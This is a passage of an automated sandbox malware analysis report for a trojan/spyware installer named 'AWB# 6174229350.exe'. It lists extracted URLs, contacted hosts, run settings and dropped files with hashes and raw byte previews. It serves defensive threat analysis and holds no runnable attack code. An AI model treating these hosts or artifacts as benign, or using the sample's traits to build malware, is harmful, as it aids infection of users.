                                              http://cps.letsencrypt.org0CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://crl.certum.pl/ctnca.crl0kAWB# 6174229350.exefalse
                                                high
                                                http://crl.ssc.lt/root-b/cacrl.crl0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://web.ncdc.gov.sa/crl/nrcacomb1.crl0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.certicamara.com/dpc/0ZCasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0GCasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crl.pki.wellsfargo.com/wsprca.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://wwww.certigna.fr/autorites/0mCasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.dnie.es/dpc0CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://ca.mtin.es/mtin/DPCyPoliticas0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.anf.es/AC/ANFServerCA.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrorErrorAWB# 6174229350.exefalse
                                                        high
                                                        http://www.globaltrust.info0CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://certificates.starfieldtech.com/repository/1604CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://acedicom.edicomgroup.com/doc0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.certplus.com/CRL/class3TS.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://crl.anf.es/AC/ANFServerCA.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.certeurope.fr/reference/pc-root2.pdf0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ac.economia.gob.mx/last.crl0GCasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.catcert.net/verarrelCasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://nsis.sf.net/NSIS_ErrorAWB# 6174229350.exefalse
                                                                  high
                                                                  http://www.disig.sk/ca0fCasPol.exe, 00000003.00000003.84840339869.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.e-szigno.hu/RootCA.crlCasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sk.ee/juur/crl/0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.chambersign.org/chambersignroot.crl0CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.xrampsecurity.com/XGCA.crl0CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://certs.oati.net/repository/OATICA2.crl0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.oces.trust2408.com/oces.crl0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.quovadis.bm0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://eca.hinet.net/repository0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.ssc.lt/root-a/cacrl.crl0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://certs.oaticerts.com/repository/OATICA2.crlCasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.trustdst.com/certificates/policy/ACES-index.html0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://certs.oati.net/repository/OATICA2.crt0CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.accv.es00CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.pkioverheid.nl/policies/root-policy-G20CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.netlock.net/docsCasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.e-trust.be/CPS/QNcertsCasPol.exe, 00000003.00000003.83848350648.0000000020B36000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88290523102.0000000020B36000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84838110098.0000000020B33000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://ocsp.ncdc.gov.sa0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://fedir.comsign.co.il/crl/ComSignCA.crl0CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://crl.certum.pl/ctsca2021.crl0oAWB# 6174229350.exefalse
                                                                            high
                                                                            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://web.ncdc.gov.sa/crl/nrcaparta1.crlCasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.datev.de/zertifikat-policy-int0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://repository.luxtrust.lu0CasPol.exe, 00000003.00000003.83845129345.0000000020B2C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844927832.0000000020B29000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://cps.chambersign.org/cps/chambersroot.html0CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://r3.i.lencr.org/0UCasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              142.250.181.238
                                                                              drive.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              37.59.226.102
                                                                              hemegas.esFrance
                                                                              16276OVHFRfalse
                                                                              216.58.212.161
                                                                              googlehosted.l.googleusercontent.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                              Analysis ID:671113
                                                                              Start date and time: 21/07/202215:26:242022-07-21 15:26:24 +02:00
                                                                              Joe Sandbox Product:CloudBasic
                                                                              Overall analysis duration:0h 13m 31s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:light
                                                                              Sample file name:AWB# 6174229350.exe
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                              Run name:Suspected Instruction Hammering
                                                                              Number of analysed new started processes analysed:21
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • HDC enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/9@3/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HDC Information:
                                                                              • Successful, ratio: 28.9% (good quality ratio 28.4%)
                                                                              • Quality average: 86.8%
                                                                              • Quality standard deviation: 21.5%
                                                                              HCA Information:
                                                                              • Successful, ratio: 99%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 0
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                              • TCP Packets have been reduced to 100
                                                                              • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.207.122, 93.184.221.240
                                                                              • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, client.wns.windows.com, wu.ec.azureedge.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              TimeTypeDescription
                                                                              15:29:09API Interceptor2615x Sleep call for process: CasPol.exe modified
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              No context
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):106237
                                                                              Entropy (8bit):6.596462544420363
                                                                              Encrypted:false
                                                                              SSDEEP:1536:XrWRLM6TxFKY705Zpw/DS3QUcqFGm+eypxwi06cFwKB1fwiJbKOG:+w6T+BHw7JUcqFGmpys6IH9vG
                                                                              MD5:C7C32D4C72FB3ABDDF0096D550D01505
                                                                              SHA1:721B9E7888FDB4E4C2EE43D36E48842FA1F6279A
                                                                              SHA-256:C85B3AFDB08D6DE26E6BE85B7FFA125354949552B77D3E62669D4E8F5CEF517D
                                                                              SHA-512:0116C5D560B36A3EE96F144FEA4170D96AC08FBA6F53D19CC5D67FB4AE0CB1DA9350C0E03597A60E94FCAAC852BDE47863E35FE36ABDFB46034149CD5DDDCE28
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:x..T.(H.I......,..aP..m....\D..2.?..Y.(.vn#...............)Ib!fa.lFN.>.9.6.@.....^.Q..E...U.s..=...Xw./zTB1,.T.e.1.E...3....c.y...&v...j.....]...'qQS.Lz.j.3.w.X....,W......Q..%B.}3v6f...y4s...F.bh.|3...a....i@...e4..ff6.1.[..zq......;..S..`.&4...y..G.I.~%..U".uX...:...Bu...K?...^5i7.bG...;.9......O...1..j.;..>.;K....#.Ku%q..../.oX....Cs..5.0%.y.Nd.......D.T.).%.....`t.P...8.t.rP.`...f.X...L...Y.....4......N..^".!..L9>.s...SEI]..e..m.;'..6m.......1.?).4h......?@....v.....,,/0..X..`.}..<...."..L.D...M.9&.ld.F.......R.8...<).W....y...sCy..w....F...sN..":h...h......"$I...Bv.2..\...ko.'...<.,..|..xmo...rrdF.'..cw...\;.#..A...u.5..h......o..[.i..4.S.8....{;.m.H.j.KHo.....-.|~_..NHzW..Ct..l.~.+xm...|.B_..;&f.0...$....D.~..Q.$./..]./.....L,U.D=..<(/F........i...IkZ.|..KOE1...J..F..MMRPx...&...V..l&....pP.[..P..q..l....].f.:].q._0.]L..7Gf...^2.BKT|....CTvn)%.``d.\..<....kB+.W.Q-.f.v.j.i.#...B.~.`.P.S......fC\19F.|........]..-...#?..b:1..o..S......
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):156
                                                                              Entropy (8bit):6.007250243700944
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPl9vt3lAnsrtxBllcoPyg7dDHhlTM80iiGVfOjlUdDi3DjEz8up:6v/lhPyseoBdDHzMSVQyRizo8up
                                                                              MD5:E4FDDACDED685E4CAEB80D1B8CACDD91
                                                                              SHA1:BCFD3787394D7E8F128CB874DEA586D9BEC76D81
                                                                              SHA-256:795CB6DC5FAC7EBCA62E1342EC2AA8373CBE48CE6873449D9E860E653925C5AB
                                                                              SHA-512:46341CA9BAC414AF6990C463AEEEC53AEB735F3187DDE0AEC27CD628888861B74DA7D1A974921C0E9DE75D8221E445D4DDCE818317FC808EE34BC8D5C7E45E43
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:.PNG........IHDR................a....sBIT....|.d....SIDAT8..A.. ......V...$.Qj.....3..... .8W...UA.bGG#. ...k.P .r.Wf..2...?.`....-7eR&..z.....IEND.B`.
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):440
                                                                              Entropy (8bit):7.339133975421591
                                                                              Encrypted:false
                                                                              SSDEEP:12:6v/7NXc8mXNokxtoQfHM67LKnuV82p9Jsvlc:4LmdoYfz7mcp9wG
                                                                              MD5:AE7DEA31387AD7EB0637112CE43F0D55
                                                                              SHA1:B1A44BABE57F0905AD7CCDF2902234465AC25B56
                                                                              SHA-256:4B1048197C8373807CD08BE2BC9A5A28B03D1C410972F77CC9E501F51CEE0FA0
                                                                              SHA-512:A63DC5F8BC0EB6274C8590BDEDEDCC0F41CAD29B47DDF2F7AF3704234854F11D33AB1DDB5E42E56E8F33A34D6755D73570017D30C949B0439C4BEAAACFBCB2E4
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR................a....IDATx...C.\Q..{..3.6..2.6..m.y......m.......x...lN.q.......^.....pi.v.(......*.....d.Y...-1.3...|....w..o>........./.G.^G.@....."....:..;..|~..@.(...R.2.....|>...z..T.......d.J......?.i. .o..v...pS .c..#....4.=...X..GF...6=C..>....mV&...wz...gb}.V..g...&....e.)..,.....aF..V.>...j.lN.....{"....4....5.t.&.0 ..8.<ab.l,.I...{...."...-..N...p` .\.-E.....$.....e@.,..Z'....k......IEND.B`.
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):257
                                                                              Entropy (8bit):6.744690702401818
                                                                              Encrypted:false
                                                                              SSDEEP:6:6v/lhPysP4HuafsQhstCa4FRRqrtVrZLCbPszjevX5u/jp:6v/7v4H5s1tZ4XQ5N1uszjef5u/N
                                                                              MD5:510BF68FAB8C89BB84C83F5DB1FEB62A
                                                                              SHA1:06AECD7F2ACDF110F6F6729D48BCA685AA8D291B
                                                                              SHA-256:4C5FAD50942204C11E84F6C3AC1EEAF3480A51F4EFF6F2AFEEA190D567B0DBCF
                                                                              SHA-512:67BE821E58BED37485523B8C6F51667FFE66FA30CFDBA41A3DE3104FDD248A95388570444D1F13C59ABD7425DF161BEC6BB46BF40951E651EA9DD68EA1E647AC
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1N.@....N.A..Y..u()(8....GHG..n..XIE..#..".w.1"....z;.vV...."..8A.......!'.b.2P..!...*~.O~....Z\..7.....n..T....!.......`..`...b..`..b(3Q...I_.@..].op..D...\..........w#}?..\.)O........IEND.B`.
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):330
                                                                              Entropy (8bit):7.142634875459961
                                                                              Encrypted:false
                                                                              SSDEEP:6:6v/lhPysNoLfiWWuAELYe8wxdn4TJ40vM0AuONU6C3gUwy3p:6v/7toLfTWuvYXwxUM0AuiUN3ka
                                                                              MD5:95C1450EFAF34E5A42E90264A307B404
                                                                              SHA1:D23DDCBF9FBDD785311246FDC0FA5F14C1BF3F45
                                                                              SHA-256:F399A07B2242F0B0E452D21A1E8F6CE9B3A75BB5FD00B0E513B2E0F3553D9FC0
                                                                              SHA-512:418B2331308A67C79DBED7E9723B7B6007DD8595EAA36D572A1C03501F44965449ED00B2076C5E756F73239395B8C71DB6632C9399B11ABC99E5C7CAA3096535
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...O+.Q.......+)..)[Y(Y....Iv.j....`a.;P.......)ee'..3.E..i...y...=...{.M<....5.5l.R...q..,.b..:..j._......x.g...P.#...v...Q.5&1.Z....?..1.X..s....H...U..D_'s..O..t...S..3..G...../c..........6..e....^.D.!.;z.#..%\&.5......gIX....}..&.PA....c.<........IEND.B`.
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):83143
                                                                              Entropy (8bit):7.997908928071602
                                                                              Encrypted:true
                                                                              SSDEEP:1536:d8zM6o6XZVm7w0AMSpr+ZsPFTER8SCtJw7BdjuVyjrJEfYl:d8I6HbCg5GqSiiNdSVyvGwl
                                                                              MD5:BA154548736EF4150C3C1801C93A7087
                                                                              SHA1:56BCD6C82C4E008218214C4BA9CCFEFCFD3C23F5
                                                                              SHA-256:A7366A57B767C007BE48D9A3D681551D4EB471629584BE96CC68D700CA61D4FE
                                                                              SHA-512:AFD9561C2D0B399C0250CEF93D41505A708FB5790CB184EC8FD6AFB0B159F3BC7447CD0982E248C35ADB2BC51C3A2AE158D1C5C009FC16358D3E3BF26146CAD1
                                                                              Malicious:false
                                                                              Preview:.1.F...8C.4E[}:.1..SaO.A...&Mhg...v..o..N.#.9.0*...7.....+.....k......@F.D..9...5.U..&...x-uv.r.....6.5.......,...uY.^A....S...I<.PD..e....r...qO|....J...5...N.....e...8..T:.q..F........$.i....@.......flv.5VC.y.n...<g.:..A.9&..5.6.3.....W..2R...I...}...1.....q....q)~.5)E.(.DNW.Kn}....A......h..8....$7.q`'.,.:D.G..g........r..-...x..L.4m[.....e[}..}.p.....zs.."..$......lG.x.0.Z ..$.....+>......wss....t.04@.+..J4.....F...C{]sN._....p....W.....I.4..........n(...9.....7................Y.....2+.rO@H.3....[up....p....Q......".!H.8-...[...o.l6Y.N..../..v9.N$.f)-.%B...{.s..'...D......?).*.J..k...#.,..u.}......<.....b...P6....~=o.g.....xe..K....tdi|RujxE.*-.V...8.=....L.B...(.lk.-+.q...dJ..i#.Y..+{.b.&.CdV2.......9......~>I.....h...z..{b:OR:de..?....N.)d..."..'..\o.9lZ.s.+....W.R..........O.......;..A...3..b'..e.\.....8/(F..x..h...V~......=.[20..r8i..8..k..>&{.2..v>.....3r<X.....5/[.?.F.1]2...Q X/..$ZVTN...$.o.r.1..2I..........V.7E.9..1.....
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:SVG Scalable Vector Graphics image
                                                                              Category:dropped
                                                                              Size (bytes):964
                                                                              Entropy (8bit):5.145844154990505
                                                                              Encrypted:false
                                                                              SSDEEP:24:t4CjlzsYoLZvEvuVyKbRAecFhBrN3AGMDvd0:vgVNtAecFZTMrd0
                                                                              MD5:1DAB2152BD47130D24CFF7F22276B243
                                                                              SHA1:9C6CCE6A0F46A827EA304B635B04C5DDA1716DD5
                                                                              SHA-256:99C7BE943EB12122F95C9428F94379A1385D1EE9A98A8084905E82E4D4201BB1
                                                                              SHA-512:3C7A694DC16E7C7516FFE834AF1CADD14AF1F1CE24552F1DD52ECD6E425BBE7AA64C8FDC9A6F4072CF64CD10C08AD3854B4E6E702BA0996522CB8D2CBF6D3033
                                                                              Malicious:false
                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <g fill="#2e3436">. <path d="M6 0v5.523l2 2V3.414L9.586 5 7.53 7.055l1.414 1.414 2.762-2.762a1 1 0 000-1.414l-4-4A1 1 0 007 0h-.016zm0 8.473v.113l-2.707 2.707A.996.996 0 003 12v1h1a.996.996 0 00.707-.293L6 11.414V16h1a1 1 0 00.707-.293l2.764-2.764-1.414-1.414L8 12.586v-2.113z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;white-space:normal;shape-padding:0;isolation:auto;mix-blend-mode:normal;solid-color:#000;solid-opacity:1" color="#000" font-weight="400" font-family="sans-serif" overflow="visible"/>. <path d="M1.531.469L.47 1.53l14 14 1.062-1.062z"/>. </g>.</svg>.
                                                                              Process:C:\Users\user\Desktop\AWB# 6174229350.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):12288
                                                                              Entropy (8bit):5.7526639220430935
                                                                              Encrypted:false
                                                                              SSDEEP:192:rFiQJ771Jt17C8F1A5xjGNNvgFOiLb7lrT/L93:X71Jt48F2eNvgFF/L
                                                                              MD5:792B6F86E296D3904285B2BF67CCD7E0
                                                                              SHA1:966B16F84697552747E0DDD19A4BA8AB5083AF31
                                                                              SHA-256:C7A20BCAA0197AEDDDC8E4797BBB33FDF70D980F5E83C203D148121C2106D917
                                                                              SHA-512:97EDC3410B88CA31ABC0AF0324258D2B59127047810947D0FB5E7E12957DB34D206FFD70A0456ADD3A26B0546643FF0234124B08423C2C9FFE9BDEC6EB210F2C
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....Oa...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):30
                                                                              Entropy (8bit):3.964735178725505
                                                                              Encrypted:false
                                                                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                              MD5:9F754B47B351EF0FC32527B541420595
                                                                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                              Malicious:false
                                                                              Preview:NordVPN directory not found!..
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                              Entropy (8bit):5.606315614482781
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:AWB# 6174229350.exe
                                                                              File size:665944
                                                                              MD5:41bd0682b694583a44500d4035904843
                                                                              SHA1:b347b198fc8cadcd7c332a58e96e36cc3aa66e99
